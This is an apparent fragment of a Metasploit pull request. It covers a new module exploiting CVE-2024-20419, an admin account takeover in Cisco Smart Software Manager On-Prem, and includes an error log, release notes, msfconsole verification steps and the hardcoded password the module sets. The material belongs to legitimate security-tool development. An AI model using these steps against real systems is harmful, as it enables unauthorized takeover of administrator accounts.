[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, There was an error resetting the password: Password should contain at least one uppercase and one lower case "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
@jheysel-r7 Thank you for all the reliability improvements and explanations. |
Release NotesThis is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206, by changing the password of the admin user to one that is attacker-controlled. |
This is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206 (CVE-2024-20419), by changing the password of the admin user to an attacker-controlled one.
Verification Steps
msfconsole
use auxiliary/admin/http/cisco_ssm_onprem_account
set RHOSTS <IP>
set SSL true
run
A new password (currently hardcoded to
Testbaaasab@123456780
) should have been set for theadmin
account.Successfully tested on